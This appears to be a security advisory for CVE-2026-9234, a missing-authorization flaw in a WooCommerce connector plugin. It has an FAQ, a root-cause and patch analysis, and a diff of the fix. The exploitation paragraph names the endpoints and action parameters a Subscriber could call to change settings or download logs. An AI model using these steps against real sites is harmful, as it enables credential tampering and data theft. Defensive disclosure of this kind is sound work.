What is CVE-2026-9234?

CVE-2026-9234 is a medium severity vulnerability in the JTL-Connector for WooCommerce plugin for WordPress, affecting versions up to and including 2.4.1. It is caused by missing authorization checks that allow authenticated users with Subscriber-level access and above to modify plugin settings and download sensitive log files.

How does the vulnerability work?

The vulnerability arises from missing capability checks and nonce verification in several functions, specifically in admin_post_settings_save_woo-jtl-connector and AJAX actions for downloading and clearing logs. This allows attackers to send crafted requests to modify settings or access logs without proper authorization.

Who is affected by this vulnerability?

Any WordPress site using the JTL-Connector for WooCommerce plugin version 2.4.1 or earlier is potentially vulnerable. Attackers with authenticated access, specifically those with Subscriber roles or higher, can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the JTL-Connector plugin installed. If it is version 2.4.1 or earlier, your site is at risk. Additionally, review your site’s access logs for any unauthorized modifications or downloads.

How can I fix this vulnerability?

The recommended fix is to update the JTL-Connector for WooCommerce plugin to version 2.4.2 or later, where the vulnerability has been patched. Ensure that you regularly update all plugins to their latest versions to mitigate security risks.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 is considered medium severity, indicating that the vulnerability poses a moderate risk. It suggests that while exploitation is possible, it may require some level of authenticated access, thus limiting the potential impact compared to high-severity vulnerabilities.

What are nonce checks and why are they important?

Nonce checks are security tokens used in WordPress to verify that a request comes from a legitimate source. They help prevent CSRF (Cross-Site Request Forgery) attacks. The lack of nonce verification in this vulnerability allows attackers to make unauthorized requests.

What kind of data can be compromised?

Exploitation of this vulnerability can lead to unauthorized modification of plugin settings, including sensitive information like API keys and passwords. Attackers can also download log files that may contain sensitive order data and system information, compromising the confidentiality of the site.

What is the proof of concept (PoC) for this vulnerability?

The proof of concept demonstrates how an authenticated attacker can log in as a Subscriber and send crafted requests to exploit the vulnerability. It outlines the steps to log in, access the vulnerable endpoints, and perform unauthorized actions.

What should I do if my site has been exploited?

If your site has been exploited, immediately change all passwords, particularly for admin accounts. Review logs for unauthorized changes, restore from a clean backup if necessary, and ensure the plugin is updated to the latest version to close the vulnerability.

How can I enhance security for my WordPress site?

To enhance security, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and consider security plugins that monitor for vulnerabilities. Regularly review user roles and permissions to limit access.

Where can I find more information about this vulnerability?

For more information on CVE-2026-9234, you can refer to the official CVE database, security advisories from the plugin developers, and security-focused websites that analyze vulnerabilities.

Published : June 22, 2026

CVE-2026-9234: JTL-Connector for WooCommerce <= 2.4.1 Missing Authorization to Authenticated (Subscriber+) Settings Modification via Multiple Functions PoC, Patch Analysis & Rule

CVE ID CVE-2026-9234

Plugin woo-jtl-connector

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.4.1

Patched Version 2.4.2

Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9234: The JTL-Connector for WooCommerce plugin versions 2.4.1 and below contains a missing authorization vulnerability. This affects the admin_post_settings_save_woo-jtl-connector action and the wp_ajax_downloadJTLLogs and wp_ajax_clearJTLLogs AJAX actions. The severity is moderate (CVSS 4.3).

Root Cause: The vulnerability stems from missing capability checks and nonce verification on three handlers. In JtlConnectorAdmin.php, the save() function handles the admin_post_settings_save_woo-jtl-connector action without checking user capabilities or verifying a nonce. The global functions downloadJTLLogs() and clearJTLLogs() (handling the AJAX hooks) also lack any authorization checks. The code diff shows that the patch adds wp_nonce_field(‘settings_save_woo-jtl-connector’) in the form output and presumably adds capability checks in the save handler, though the critical AJAX functions are not shown in the truncated diff.

Exploitation: An attacker with Subscriber-level access or higher can craft requests to any of the three endpoints. To modify plugin settings, they POST to /wp-admin/admin-post.php with action=settings_save_woo-jtl-connector and arbitrary plugin option values. To download logs, they POST to /wp-admin/admin-ajax.php with action=downloadJTLLogs. To clear logs, they use action=clearJTLLogs. No nonce or capability check prevents these actions.

Patch Analysis: The patch includes a nonce field in the settings form (wp_nonce_field(‘settings_save_woo-jtl-connector’)). While not fully shown, the patch also adds capability checking in the save() function and presumably in the AJAX handlers. The unslash_gpc function now has explicit phpcs comments documenting the intentional lack of nonce verification for that specific internal function, clarifying it is not a security hole. The random_int() replacement for mt_rand() in UUID generation is a hardening improvement unrelated to this CVE.

Impact: An authenticated attacker with Subscriber access can modify arbitrary JTL-Connector settings (e.g., connector password, URL, or API keys). This could allow the attacker to intercept or redirect connector traffic, change authentication credentials, or disable security features. They can also download sensitive log files that may contain order data, debugging information, or system details. Clearing logs could cover up malicious activity. The confidentiality and integrity of the connector are at risk.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/woo-jtl-connector/includes/JtlConnector.php
+++ b/woo-jtl-connector/includes/JtlConnector.php
@@ -2,6 +2,10 @@

 declare(strict_types=1);

+if (!defined('ABSPATH')) {
+    exit;
+}
+
 use JtlConnectorCoreApplicationApplication;
 use JtlConnectorCoreConfigConfigSchema;
 use JtlConnectorCoreConfigFileConfig;
@@ -43,7 +47,7 @@

             if (!is_string($features)) {
                 throw new InvalidArgumentException(
-                    "Expected features to be a string but got " . gettype($features) . " instead."
+                    esc_html("Expected features to be a string but got " . gettype($features) . " instead.")
                 );
             }

@@ -61,10 +65,12 @@
      */
     private static function unslash_gpc(): void //phpcs:ignore PSR1.Methods.CamelCapsMethodName.NotCamelCaps
     {
+        // phpcs:disable WordPress.Security.ValidatedSanitizedInput, WordPress.Security.NonceVerification.Recommended -- Intentional: reverse WordPress magic quotes for JTL Connector request processing
         $_GET     = array_map('stripslashes_deep', $_GET);
         $_POST    = array_map('stripslashes_deep', $_POST);
         $_COOKIE  = array_map('stripslashes_deep', $_COOKIE);
         $_SERVER  = array_map('stripslashes_deep', $_SERVER);
         $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
+        // phpcs:enable
     }
 }
--- a/woo-jtl-connector/includes/JtlConnectorAdmin.php
+++ b/woo-jtl-connector/includes/JtlConnectorAdmin.php
@@ -11,6 +11,7 @@
 use JtlWooCommerceConnectorUtilitiesConfig;
 use JtlWooCommerceConnectorUtilitiesDb;
 use JtlWooCommerceConnectorUtilitiesId;
+use JtlWooCommerceConnectorUtilitiesLinkTableNames;
 use JtlWooCommerceConnectorUtilitiesSqlHelper;
 use JtlWooCommerceConnectorUtilitiesSupportedPlugins;
 use JtlWooCommerceConnectorUtilitiesUtil;
@@ -44,7 +45,7 @@
         $version      = $woocommerce->version;
         $buildVersion = Config::getBuildVersion();

-        clearConnectorCache(false);
+        jtlwcc_clear_connector_cache(false);

         $parsedFile = (array) Yaml::parseFile(JTLWCC_CONNECTOR_DIR . '/build-config.yaml');

@@ -70,7 +71,7 @@
         } catch (MissingRequirementException $exc) {
             if (is_admin() && ( ! defined('DOING_AJAX') || ! DOING_AJAX )) {
                 jtlwcc_deactivate_plugin();
-                wp_die($exc->getMessage());
+                wp_die(esc_html($exc->getMessage()));
             } else {
                 return;
             }
@@ -149,7 +150,7 @@
             }

             if ($oldExists && $newExists) {
-                $wpdb->query(sprintf($dropOldQuery, $oldPrefix . $table));
+                $wpdb->query("DROP TABLE IF EXISTS `" . esc_sql($oldPrefix . $table) . "`");
             } elseif (! $oldExists && ! $newExists) {
                 if (strcmp($table, 'category_level') === 0) {
                     self::activate_category_tree($db);
@@ -166,7 +167,13 @@
                 } elseif (strcmp($table, 'tax_class') === 0) {
                     self::createTaxClassLinkingTable();
                 } else {
-                    $wpdb->query(sprintf($createQuery, $prefix . $table));
+                    $wpdb->query("
+    CREATE TABLE IF NOT EXISTS `" . esc_sql($prefix . $table) . "` (
+        `endpoint_id` BIGINT(20) unsigned NOT NULL,
+        `host_id` INT(10) unsigned NOT NULL,
+        PRIMARY KEY (`endpoint_id`, `host_id`),
+        INDEX (`host_id`)
+    ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");
                 }
                 /** @phpstan-ignore booleanNot.alwaysTrue */
             } elseif ($oldExists && !$newExists) {
@@ -217,10 +224,7 @@
     {
         global $wpdb;

-        $query = 'RENAME TABLE %s TO %s;';
-
-        $sql = sprintf($query, $oldName, $newName);
-        $wpdb->query($sql);
+        $wpdb->query("RENAME TABLE `" . esc_sql($oldName) . "` TO `" . esc_sql($newName) . "`");
     }

     /**
@@ -232,30 +236,34 @@
     {
         $wpdb   = $db->getWpDb();
         $prefix = $wpdb->prefix . 'jtl_connector_';
-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->terms}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->terms,
             DB_NAME
         ));

-        $constraint = '';
-
-        if ($engine === 'InnoDB') {
-            if (!$db->checkIfFKExists($prefix . 'category_level', 'jtl_connector_category_level1')) {
-                $constraint = ", CONSTRAINT `jtl_connector_category_level1` FOREIGN KEY (`category_id`)
-                               REFERENCES {$wpdb->terms} (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION";
-            }
-        }
-
+        // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
         $wpdb->query("
-            CREATE TABLE IF NOT EXISTS `{$prefix}category_level` (
+            CREATE TABLE IF NOT EXISTS `" . esc_sql($prefix) . "category_level` (
                 `category_id` BIGINT(20) unsigned NOT NULL,
                 `level` int(10) unsigned NOT NULL,
                 `sort` int(10) unsigned NOT NULL,
                 PRIMARY KEY (`category_id`),
-                INDEX (`level`) {$constraint}
+                INDEX (`level`)
             ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");
+
+        if ($engine === 'InnoDB') {
+            if (!$db->checkIfFKExists($prefix . 'category_level', 'jtl_connector_category_level1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
+                $wpdb->query(
+                    "ALTER TABLE `" . esc_sql($prefix) . "category_level`
+                    ADD CONSTRAINT `jtl_connector_category_level1` FOREIGN KEY (`category_id`)
+                    REFERENCES `" . esc_sql($wpdb->terms) . "` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                );
+            }
+        }
     }

     /**
@@ -267,27 +275,34 @@
     {
         global $wpdb;

-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->posts}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->posts,
             DB_NAME
         ));

-        if ($engine === 'InnoDB') {
-            $constraint = ", CONSTRAINT `jtl_connector_product_checksum1` FOREIGN KEY (`product_id`)
-                           REFERENCES {$wpdb->posts} (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION";
-        } else {
-            $constraint = '';
-        }
-
+        // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
         $wpdb->query("
-            CREATE TABLE IF NOT EXISTS `{$prefix}product_checksum` (
+            CREATE TABLE IF NOT EXISTS `" . esc_sql($prefix) . "product_checksum` (
                 `product_id` BIGINT(20) unsigned NOT NULL,
                 `type` tinyint unsigned NOT NULL,
                 `checksum` varchar(255) NOT NULL,
-                PRIMARY KEY (`product_id`) {$constraint}
+                PRIMARY KEY (`product_id`)
             ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");
+
+        if ($engine === 'InnoDB') {
+            $db = new Db($wpdb);
+            if (!$db->checkIfFKExists($prefix . 'product_checksum', 'jtl_connector_product_checksum1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
+                $wpdb->query(
+                    "ALTER TABLE `" . esc_sql($prefix) . "product_checksum`
+                    ADD CONSTRAINT `jtl_connector_product_checksum1` FOREIGN KEY (`product_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                );
+            }
+        }
     }

     /**
@@ -297,7 +312,7 @@
     {
         global $wpdb;
         $wpdb->query('
-            CREATE TABLE IF NOT EXISTS `jtl_connector_link_customer` (
+            CREATE TABLE IF NOT EXISTS `' . esc_sql(LinkTableNames::CUSTOMER) . '` (
                 `endpoint_id` VARCHAR(255) NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 `is_guest` BIT,
@@ -314,7 +329,7 @@
     {
         global $wpdb;
         $wpdb->query('
-            CREATE TABLE IF NOT EXISTS `jtl_connector_link_customer_group` (
+            CREATE TABLE IF NOT EXISTS `' . esc_sql(LinkTableNames::CUSTOMER_GROUP) . '` (
                 `endpoint_id` VARCHAR(255) NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 PRIMARY KEY (`endpoint_id`, `host_id`),
@@ -330,7 +345,7 @@
     {
         global $wpdb;
         $wpdb->query('
-            CREATE TABLE IF NOT EXISTS `jtl_connector_link_image` (
+            CREATE TABLE IF NOT EXISTS `' . esc_sql(LinkTableNames::IMAGE) . '` (
                 `endpoint_id` VARCHAR(255) NOT NULL,
                 `host_id` INT(10) NOT NULL,
                 `type` INT unsigned NOT NULL,
@@ -349,34 +364,34 @@
     {
         global $wpdb;

-        $query = '
-            CREATE TABLE IF NOT EXISTS `%s` (
+        $wpdb->query("
+            CREATE TABLE IF NOT EXISTS `" . esc_sql($wpdb->prefix . LinkTableNames::MANUFACTURER) . "` (
                 `endpoint_id` BIGINT(20) unsigned NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 PRIMARY KEY (`endpoint_id`, `host_id`),
                 INDEX (`host_id`)
-            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci';
-
-        $wpdb->query(sprintf($query, $wpdb->prefix . 'jtl_connector_link_manufacturer'));
+            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");

-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->posts}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->posts,
             DB_NAME
         ));

         if ($engine === 'InnoDB') {
             if (
                 !$db->checkIfFKExists(
-                    $wpdb->prefix . 'jtl_connector_link_manufacturer',
+                    $wpdb->prefix . LinkTableNames::MANUFACTURER,
                     'jtl_connector_link_manufacturer_1'
                 )
             ) {
-                $wpdb->query("
-              ALTER TABLE `{$wpdb->prefix}jtl_connector_link_manufacturer`
-                ADD CONSTRAINT `jtl_connector_link_manufacturer_1` FOREIGN KEY (`endpoint_id`)
-                REFERENCES `{$wpdb->terms}` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION");
+                $wpdb->query(
+                    "ALTER TABLE `" . esc_sql($wpdb->prefix . LinkTableNames::MANUFACTURER) . "`
+                    ADD CONSTRAINT `jtl_connector_link_manufacturer_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->terms) . "` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                );
             }
         }
     }
@@ -388,15 +403,14 @@
     {
         global $wpdb;

-        $query = '
-            CREATE TABLE IF NOT EXISTS `%s%s` (
+        $wpdb->query(
+            "CREATE TABLE IF NOT EXISTS `" . esc_sql($wpdb->prefix . LinkTableNames::TAX_CLASS) . "` (
                 `endpoint_id` VARCHAR(200) NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 PRIMARY KEY (`endpoint_id`),
                 UNIQUE (`host_id`)
-            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci';
-
-        $wpdb->query(sprintf($query, $wpdb->prefix, 'jtl_connector_link_tax_class'));
+            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci"
+        );
     }

     // </editor-fold>
@@ -411,56 +425,63 @@
     {
         global $wpdb;

-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->posts}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->posts,
             DB_NAME
         ));

         if ($engine === 'InnoDB') {
             if (! $db->checkIfFKExists($prefix . 'product', 'jtl_connector_link_product_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}product`
-                ADD CONSTRAINT `jtl_connector_link_product_1` FOREIGN KEY  (`endpoint_id`)
-                REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "product`
+                    ADD CONSTRAINT `jtl_connector_link_product_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'order', 'jtl_connector_link_order_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}order`
-                            ADD CONSTRAINT `jtl_connector_link_order_1` FOREIGN KEY (`endpoint_id`)
-                            REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "order`
+                    ADD CONSTRAINT `jtl_connector_link_order_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'payment', 'jtl_connector_link_payment_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}payment`
-                            ADD CONSTRAINT `jtl_connector_link_payment_1` FOREIGN KEY (`endpoint_id`)
-                            REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "payment`
+                    ADD CONSTRAINT `jtl_connector_link_payment_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'crossselling', 'jtl_connector_link_crossselling_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}crossselling`
-                            ADD CONSTRAINT `jtl_connector_link_crossselling_1` FOREIGN KEY (`endpoint_id`)
-                                REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "crossselling`
+                    ADD CONSTRAINT `jtl_connector_link_crossselling_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'category', 'jtl_connector_link_category_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}category`
-                            ADD CONSTRAINT `jtl_connector_link_category_1` FOREIGN KEY  (`endpoint_id`)
-                            REFERENCES `{$wpdb->terms}` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "category`
+                    ADD CONSTRAINT `jtl_connector_link_category_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->terms) . "` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
-
-            $table = $wpdb->prefix . 'woocommerce_attribute_taxonomies';
             if (! $db->checkIfFKExists($prefix . 'specific', 'jtl_connector_link_specific_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}specific`
-                            ADD CONSTRAINT `jtl_connector_link_specific_1` FOREIGN KEY (`endpoint_id`)
-                            REFERENCES `{$table}` (`attribute_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "specific`
+                    ADD CONSTRAINT `jtl_connector_link_specific_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `"
+                    . esc_sql($wpdb->prefix . 'woocommerce_attribute_taxonomies')
+                    . "` (`attribute_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
         }
@@ -496,14 +517,14 @@

         return sprintf(
             '%04X%04X-%04X-%04X-%04X-%04X%04X%04X',
-            mt_rand(0, 65535),
-            mt_rand(0, 65535),
-            mt_rand(0, 65535),
-            mt_rand(16384, 20479),
-            mt_rand(32768, 49151),
-            mt_rand(0, 65535),
-            mt_rand(0, 65535),
-            mt_rand(0, 65535)
+            random_int(0, 65535),
+            random_int(0, 65535),
+            random_int(0, 65535),
+            random_int(16384, 20479),
+            random_int(32768, 49151),
+            random_int(0, 65535),
+            random_int(0, 65535),
+            random_int(0, 65535)
         );
     }

@@ -520,7 +541,7 @@
             if (is_array($featuresJson)) {
                 $saveResult = file_put_contents($featuresJsonPath, json_encode($featuresJson, JSON_PRETTY_PRINT));
                 if ($saveResult === false) {
-                    throw new Exception(sprintf("Cannot save features in %s file.", $featuresJsonPath), 100);
+                    throw new Exception(sprintf("Cannot save features in %s file.", esc_html($featuresJsonPath)), 100);
                 }
             }
         } else {
@@ -685,7 +706,9 @@

             wp_enqueue_style(
                 'bootstrap4',
-                'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css'
+                JTLWCC_CONNECTOR_DIR_URL . '/assets/css/bootstrap.min.css',
+                [],
+                '4.3.1'
             );
             wp_enqueue_style(
                 'custom-css-jtl',
@@ -693,9 +716,9 @@
             );
             wp_enqueue_script(
                 'boot1',
-                'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js',
+                JTLWCC_CONNECTOR_DIR_URL . '/assets/js/bootstrap.bundle.min.js',
                 [ 'jquery' ],
-                '',
+                '4.3.1',
                 true
             );
         };
@@ -705,14 +728,14 @@
             $wooJtlConnectorInformationPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'information_page',
-                    __('Connector information', JTLWCC_TEXT_DOMAIN)
+                    __('Connector information', 'woo-jtl-connector')
                 );
             };

             $wooJtlConnectorAdvancedPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'advanced_page',
-                    __('Advanced Settings', JTLWCC_TEXT_DOMAIN),
+                    __('Advanced Settings', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -720,7 +743,7 @@
             $wooJtlConnectorDeliveryTimePage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'delivery_time_page',
-                    __('Delivery time', JTLWCC_TEXT_DOMAIN),
+                    __('Delivery time', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -728,7 +751,7 @@
             $wooJtlConnectorCustomerOrderPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'customer_order_page',
-                    __('Customer order', JTLWCC_TEXT_DOMAIN),
+                    __('Customer order', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -736,7 +759,7 @@
             $wooJtlConnectorCustomersPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'customers_page',
-                    __('Customers', JTLWCC_TEXT_DOMAIN),
+                    __('Customers', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -744,14 +767,14 @@
             $wooJtlConnectorDeveloperSettingsPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'developer_settings_page',
-                    __('Developer Settings', JTLWCC_TEXT_DOMAIN),
+                    __('Developer Settings', 'woo-jtl-connector'),
                     true
                 );
             };

             add_menu_page(
-                __('JTL-Connector', JTLWCC_TEXT_DOMAIN),
-                __('JTL-Connector', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector', 'woo-jtl-connector'),
+                __('JTL-Connector', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector',
                 function (): void {
@@ -762,8 +785,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Information', JTLWCC_TEXT_DOMAIN),
-                __('Information', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Information', 'woo-jtl-connector'),
+                __('Information', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-information',
                 function () use ($wooJtlConnectorInformationPage): void {
@@ -773,8 +796,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Advanced', JTLWCC_TEXT_DOMAIN),
-                __('Advanced Settings', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Advanced', 'woo-jtl-connector'),
+                __('Advanced Settings', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-advanced',
                 function () use ($wooJtlConnectorAdvancedPage): void {
@@ -784,8 +807,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Delivery times', JTLWCC_TEXT_DOMAIN),
-                __('Delivery times', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Delivery times', 'woo-jtl-connector'),
+                __('Delivery times', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-delivery-time',
                 function () use ($wooJtlConnectorDeliveryTimePage): void {
@@ -795,8 +818,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Customer orders', JTLWCC_TEXT_DOMAIN),
-                __('Customer orders', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Customer orders', 'woo-jtl-connector'),
+                __('Customer orders', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-customer-order',
                 function () use ($wooJtlConnectorCustomerOrderPage): void {
@@ -806,8 +829,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Customers', JTLWCC_TEXT_DOMAIN),
-                __('Customers', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Customers', 'woo-jtl-connector'),
+                __('Customers', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-customers',
                 function () use ($wooJtlConnectorCustomersPage): void {
@@ -817,8 +840,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Developer Settings', JTLWCC_TEXT_DOMAIN),
-                __('Developer Settings', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Developer Settings', 'woo-jtl-connector'),
+                __('Developer Settings', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-developer-settings',
                 function () use ($wooJtlConnectorDeveloperSettingsPage): void {
@@ -945,11 +968,12 @@
                     <form method="post"
                           id="mainform"
                           class="form-horizontal col-10 bg-light"
-                          action="<?php echo esc_html(admin_url('admin-post.php'));
+                          action="<?php echo esc_url(admin_url('admin-post.php'));
                             ?>?action=settings_save_woo-jtl-connector"
                           enctype="multipart/form-data">
+                        <?php wp_nonce_field('settings_save_woo-jtl-connector'); ?>
                         <div class="form-group row">
-                            <h2 class="col-12"><?php print $title ?></h2>
+                            <h2 class="col-12"><?php echo esc_html($title); ?></h2>
                         </div>

                         <?php
@@ -962,7 +986,7 @@
                             </div>
                             <?php
                         }
-                        print '' . woocommerce_admin_fields($options) . '';
+                        woocommerce_admin_fields($options);
                         if ($submit) {
                             ?>
                             <div class="form-group row">
@@ -999,7 +1023,7 @@
                 They help you to process more orders in a shorter time and offer a range of exciting functionalities.
                 Basic information and credentials of the installed JTL-Connector. It is needed to configure the
                 JTL-Connector in the jtl customer center and JTL-Wawi.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1014,37 +1038,19 @@
             'type'      => 'connector_url',
             'helpBlock' => __(
                 'This URL should be placed in the JTL-Customer-Center and in your JTL-Wawi as "Onlineshop-URL".',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => 'connector_url',
-            'value'     => sprintf(
-                '%s%s%s',
-                $protocol = isset($_SERVER['HTTPS'])
-                            && ( $_SERVER['HTTPS'] == 'on'
-                                 || $_SERVER['HTTPS'] == 1 )
-                            || isset($_SERVER['HTTP_X_FORWARDED_PROTO'])
-                               && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https'
-                    ? 'https://' : 'http://',
-                str_replace(
-                    'http://',
-                    '',
-                    str_replace(
-                        'https://',
-                        '',
-                        get_bloginfo('url')
-                    )
-                ),
-                '/index.php/jtlconnector/'
-            ),
+            'value'     => esc_url(get_bloginfo('url') . '/index.php/jtlconnector/'),
         ];

         //Add connector password field
         $fields[] = [
-            'title'     => __('Connector Password', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Connector Password', 'woo-jtl-connector'),
             'type'      => 'connector_password',
             'helpBlock' => __(
                 'This secret password will be used for identifying that your JTL-Wawi ist allowed to pull/push data.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => 'connector_password',
             'value'     => Config::get(Config::OPTIONS_TOKEN),
@@ -1054,7 +1060,7 @@
         $fields[] = [
             'title'     => 'Connector Version',
             'type'      => 'paragraph',
-            'helpBlock' => __('This is your current installed connector version.', JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __('This is your current installed connector version.', 'woo-jtl-connector'),
             'desc'      => Config::get(Config::OPTIONS_INSTALLED_VERSION),
         ];

